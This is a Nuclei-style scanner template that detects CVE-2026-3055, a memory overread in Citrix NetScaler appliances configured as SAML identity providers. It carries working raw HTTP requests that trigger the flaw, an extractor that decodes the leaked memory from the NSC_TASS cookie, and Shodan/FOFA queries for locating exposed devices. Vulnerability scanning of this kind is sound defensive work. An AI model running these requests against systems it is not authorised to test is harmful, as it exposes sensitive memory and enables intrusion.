id: CVE-2026-3055

info:
  name: Citrix NetScaler SAML IDP - Memory Overread
  author: watchtowr,shaikhyaser,DhiyaneshDk
  severity: critical
  description: |
    NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to memory overread, letting attackers potentially access sensitive memory, exploit requires configuration as SAML IDP
  impact: |
    Attackers can cause memory overread, potentially exposing sensitive information or causing application instability.
  remediation: Update to the latest version with the fix for this vulnerability.
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300
    - https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
    - https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2026,netscaler,citrix,exposure,kev,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /saml/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiANCnhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iICANCklEPSJfMSINClZlcnNpb249IjIuMCIgUHJvdmlkZXJOYW1lPSJteSBwcm92aWRlciIgDQpEZXN0aW5hdGlvbj0iaHR0cDovL3dhdGNodG93ci9zYW1sLnBocCIgDQpQcm90b2NvbEJpbmRpbmc9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpiaW5kaW5nczpIVFRQLVBPU1QiIA0KPg0KICA8c2FtbDpJc3N1ZXI%2BaHR0cDovL3dhdGNodG93ci9zYW1sLnBocDwvc2FtbDpJc3N1ZXI%2BDQo8L3NhbWxwOkF1dGhuUmVxdWVzdD4%3D

      - |
        GET /wsfed/passive?wctx HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('(?i)NSC_TASS=[A-Za-z0-9+/]+=*', set_cookie)
          - 'status_code == 302'
          - 'contains(base64_decode(nsc_tass), "wctx=")'
          - '!contains(body, "Parsing of presented Assertion failed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - base64_decode(nsc_tass)
# digest: 4a0a004730450220406d2dccc32a82831ddc8dfdec81d513c70d55da7324594a5ead9cdcf01a770102210086e0c3ca49f0abb8959e67730de028261f4ef59e17332d52ac062fc0e84d5a40:922c64590222798bb761d5b6d8e72950